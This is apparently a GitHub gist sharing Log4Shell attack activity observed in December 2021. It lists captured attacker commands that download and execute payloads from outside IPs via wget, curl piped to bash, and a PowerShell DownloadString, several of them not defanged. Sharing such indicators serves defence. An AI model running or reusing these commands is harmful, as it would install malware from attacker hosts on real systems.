Skip to content

Instantly share code, notes, and snippets.

@zam89
Last active December 17, 2021 05:28
Show Gist options
  • Save zam89/cf06237dbbbd7c101fc2d76e30299691 to your computer and use it in GitHub Desktop.
Save zam89/cf06237dbbbd7c101fc2d76e30299691 to your computer and use it in GitHub Desktop.
todays #Log4Shell activity observed:
- cd /usr/bin;wget http://155[.]94[.]154[.]170/bbb;curl -O http://155[.]94[.]154[.]170/bbb;chmod +x bbb;./bbb
- curl 152.67.63.150/king
- curl http://159[.]89[.]4[.]39/include/pyfpjn0.x86 -O /tmp/x86; chmod 777 /tmp/x86; ./tmp/x86 apache.exploit.x86
- curl http://2[.]56[.]59[.]123/1 --output 1; wget -O 1 http://2[.]56[.]59[.]123/1; chmod +x 1;./1
- curl http://83[.]97[.]20[.]171:6666
- curl -k https://41[.]157[.]42[.]239/bk.sh | bash
- echo 152[.]62[.]45[.]26:8443
- echo 168[.]159[.]209[.]96:8443
- wget http://159[.]89[.]4[.]39/include/pyfpjn0.x86 -O /tmp/x86; chmod 777 /tmp/x86; ./tmp/x86 apache.exploit.x86
- wget http://83[.]138[.]53[.]135/p -O /tmp/p;chmod +x /tmp/p; /tmp/p &
- wget http://152[.]67[.]63[.]150/intel.sh; curl -O http://152[.]67[.]63[.]150/intel.sh; bash intel.sh 486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmGN
- curl -fsSL http://45[.]32[.]119[.]174:12229/termite/45[.]32[.]119[.]174:13333 -o /tmp/.Eh1L && chmod +x /tmp/.Eh1L && /tmp/.Eh1L
- echo 137[.]69[.]120[.]226:8443
- echo 152[.]62[.]177[.]26:8443
- powershell -c iex (( New-Object System.Net.WebClient ).DownloadString('https://textbin.net/raw/0l8h4xuvxe'))
- cd /tmp;wget http://155.94.154.170/bbb;curl -O http://155.94.154.170/bbb;chmod +x bbb;./bbb
- wget http://152.67.63.150/py; curl -O http://152.67.63.150/py; chmod 777 py; ./py rce.x86
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment